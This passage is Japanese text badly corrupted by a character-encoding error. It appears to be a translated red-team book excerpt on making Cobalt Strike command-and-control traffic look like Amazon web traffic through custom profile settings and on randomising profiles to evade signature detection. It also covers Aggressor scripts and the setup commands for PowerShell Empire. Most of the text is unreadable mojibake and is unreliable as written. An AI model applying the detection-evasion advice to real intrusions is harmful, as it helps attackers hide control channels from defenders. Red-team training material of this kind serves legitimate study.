ã¯ããã®ã¬ã€ã€ãŒã®ãããã¯ãŒã¯éä¿¡ã«ãããç°åžžãªãã©ãã£ãã¯ãæ¢ããŠããŸããããã§ã¯ãã©ã®ããã«ããŠC2éä¿¡ãéåžžã®Webãã©ãã£ãã¯ã®ããã«èŠããããšãã§ããŸããïŒããã¯ãã«ã¹ã¿ãã€ãºå¯èœãªC2ãããã¡ã€ã«ãäœçšããå Žæã§ãããã®äŸãèŠãŠãã ããããã®äŸãèªããšãããã€ãã®æçœãªæ å ±ã衚瀺ãããŸãã
ããã«ãããURIãã¹ã§HTTPãªã¯ãšã¹ããçæãããããšãããããŸãã
set uriâ/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksâ;
ãã¹ãããããŒã¯Amazonã«èšå®ãããŠããŸãïŒ
ããããŒããã¹ãããwww.amazon.comã;
äžéšã®ã«ã¹ã¿ã ãµãŒããŒããããŒã§ãããC2ãµãŒããŒããéä¿¡ãããŸãã
ããããŒãx-amz-id-1ããthkuyezkkkpgy5t42pztã;
ããã㌠"x-amz-id-2" "a21yz2xrndntddgrsa212bgv3yw85amzuzw9ydg5rzmruz2t
å€ãã®èµ€ãããŒã ããããã®ãããã¡ã€ã«ãå€ãã®ç°ãªãã¢ã¯ãã£ããã£ã§äœ¿çšããŠãããå€ãã®ã»ãã¥ãªãã£ãã³ããŒããã¹ãŠã®äžè¬çãªã«ã¹ã¿ã ãããã¡ã€ã«ã®æçŽçœ²åãäœæããŠããŸãããã®åé¡ã解決ããããã«ãç§ãã¡ã«ã§ããããšã¯:ã§ããæ§æãã¡ã€ã«å ã®ãã¹ãŠã®éçæååã倿Žããããã¹ãŠã®ãŠãŒã¶ãŒãšãŒãžã§ã³ãæ å ±ã倿ŽãããSSLã¯å®éã®èšŒææžã§æ§æããïŒCobalt Strikeã®ããã©ã«ãSSLèšŒææžã䜿çšããªãã§ãã ããïŒãJitterã¬ãŒãã調æŽããã¯ã©ã€ã¢ã³ãã®ããŒã³ã³æéã倿ŽããŸããæåŸã®ã¡ã¢ã¯ãPostïŒhttp-postïŒã³ãã³ããä»ããŠéä¿¡ã確ä¿ããããšã§ããããããªããšãã«ã¹ã¿ã æ§æãã¡ã€ã«ã䜿çšããå Žåã«å€ãã®åé¡ã«ã€ãªããå¯èœæ§ãããããã§ããæ§æãã¡ã€ã«ãhttp-getãä»ããéä¿¡ãèŠå®ããŠããå Žåã§ãæ©èœããŸããã倧ããªãã¡ã€ã«ã®ã¢ããããŒãã¯åžžã«å¶éãããŸãã GETãªã¯ãšã¹ãã¯éåžž2048æåã«å¶éãããããšãå¿ããªãã§ãã ããã
SpectorOpsã»ãã¥ãªãã£ããŒã ã¯ãé£èªåC2æ§æãã¡ã€ã«ãã«ã¹ã¿ãã€ãºãããããžã§ã¯ããäœæããŸããã
翻蚳è ã®æ³š:ãã®ã¹ã¯ãªããã¯ãCobalt Strikeã®æ§æãã¡ã€ã«ãçœ²åæ€åºãœãããŠã§ã¢ããã€ãã¹ããããã«é£èªåããããšãã§ããŸããååã¯ãæäŸãããèŸæžã®ã©ã³ãã æååã«å€æ°ã眮ãæããæ°ããé å¿æ§C2æ§æãã¡ã€ã«ãåºåããããšã§ãã
ã³ãã«ãã¹ãã©ã€ã¯ã®æ»æè ã¹ã¯ãªãã
ã³ãã«ãã¹ãã©ã€ã¯ãããžã§ã¯ãã«ã¯å€ãã®è²¢ç®è ãããŸãã Aggressor Scriptingã¯ãã¹ã¯ãªããå¯èœãªIRCã¯ã©ã€ã¢ã³ããšãããã«è§Šçºããããã¬ããããŒã ã®éçšãšå¯ŸæŠçžæã·ãã¥ã¬ãŒã·ã§ã³ã®ããã®ã¹ã¯ãªããèšèªã§ãããããéçºããã«ã¯2ã€ã®ç®çããããŸãã
é·æã«ããããããããäœæããŠãä»®æ³ã¬ããããŒã ã¡ã³ããŒãã·ãã¥ã¬ãŒãããããã¯ããããšãã§ããŸã
ãŸããããŒãºã«å¿ããŠãã³ãã«ãã¹ãã©ã€ã¯ã¯ã©ã€ã¢ã³ãã®æ©èœãæ¡åŒµããã³å€æŽããããšãã§ããŸããå ¬åŒç޹ä»ããŒãžïŒhttps://www.cobaltstrike.com/aggressor-script/index.html
äŸïŒharleyqu1nnã¯ã1ã€ã®ãããžã§ã¯ãã«ããŸããŸãªæ»æçãªã¹ã¯ãªãããå ¥ããŠããã®åŸã®ãšã¯ã¹ããã€ãã«äœ¿çšããããã«ïŒhttp://bit.ly/2qxiwpe
PowerShell Empire
Empireã¯ãçŽç²ãªPowerShell 2.0 Windowsãããã·ãšçŽç²ãªPython 2.6/2.7 Linux/OS Xãããã·ãå«ãæ©æã®ãšã¯ã¹ããã€ããã¬ãŒã ã¯ãŒã¯ã§ããããã¯ã以åã®Powershell EmpireãšPython Empyreãããžã§ã¯ãã®å䜵ã§ãããã®ãã¬ãŒã ã¯ãŒã¯ã¯ãæå·åãããå®å šãªéä¿¡ãšæè»ãªã¢ãŒããã¯ãã£ãæäŸããŸãã Powershellã®èгç¹ãããEmpireã¯PowerShell.exeãªãã§PowerShellãšãŒãžã§ã³ããå®è¡ããèœåãå®è£ ããŠããŸãããŸãããšã³ãã€ã¢ã«ã¯ãããŒããŒããã¬ãŒããããã«ãããŸã§ãè¿ éã«å±éã§ãããšã¯ã¹ããã€ãã¢ãžã¥ãŒã«ããããããããŸãããšã³ãã€ã¢ã¯ããããã¯ãŒã¯æ€åºãåé¿ããããã«éä¿¡ã調æŽããããšãã§ããŸãããããã®æ©èœã¯ãã¹ãŠãå®çšçãªãã¬ãŒã ã¯ãŒã¯ã«ã«ãã»ã«åãããŠããŸãã
ã¬ããããŒã ã®ã¹ã¿ããã«ãšã£ãŠãPowershellã¯ç§ãã¡ã®èŠªåã®äžäººã§ããæå¹ãªãã€ããŒããåæåããåŸããã®åŸã®ãã¹ãŠã®æ»æã¯ã¡ã¢ãªã«ä¿åãããŸããåžåœã®æå€§ã®å©ç¹ã¯ãéçºè ã«ãã£ãŠç©æ¥µçã«ç¶æããã³æŽæ°ãããŠãããããææ°ã®ãã¹ããšã¯ã¹ããã€ãã¢ãžã¥ãŒã«ã䜿çšããŠæ»æã§ããããšã§ãããŸããLinuxãšOS Xã®C2æ¥ç¶ããããŸãããããã£ãŠãMacããŒã¹ã®ãªãã£ã¹ãã¯ããäœæããããšãã§ããå®è¡ããããšãã«åžåœã«æ°ãããããã·ãæã€ããšãã§ããŸãã
ãã®æ¬ãéããŠåžåœããã詳现ã«ç޹ä»ãããããã©ãã»ã©åŒ·åããçè§£ã§ããããã«ããŸããåžåœã®ã»ããã¢ããã«é¢ããŠã¯ãå®å šã«æ§æããŠããããšã確èªããããšãéèŠã§ãã
èšŒææžãã¹èšŒææžãçã®ä¿¡é Œã§ããSSLèšŒææžã«èšå®ããŸãã
DefaultProfileãšã³ããã€ã³ãã倿ŽããŸããå€ãã®ã¬ã€ã€ãŒ7ãã¡ã€ã¢ãŠã©ãŒã«ã¯ãæ£ç¢ºãªéçãšã³ããã€ã³ããæ¢ããŠããŸãã
éä¿¡ã«äœ¿çšããããŠãŒã¶ãŒãšãŒãžã§ã³ãã倿ŽããŸãã
æ¬ã®æåã®2ã€ã®ãšãã£ã·ã§ã³ã§ã¯ãMetasploitã®ãœãŒã¹ãã¡ã€ã«ãèªååã«äœ¿çšãããŠãããEmpireã¯èªåçã«å®è¡ãããã¹ã¯ãªããããµããŒãããŠãããšè¿°ã¹ãŸããã
åžåœãèµ°ãïŒ
åžåœãåæåããŸã
cd/opt/Empire ./setup/reset.sh
ããã
åºå£
èšŒææžãã€ã³ã¹ããŒã«ããïŒã§ããã°å®éã®ä¿¡é Œã§ããèšŒææžã䜿çšããïŒ
./setup/cert.sh
emãå®è¡ãå§ããŸã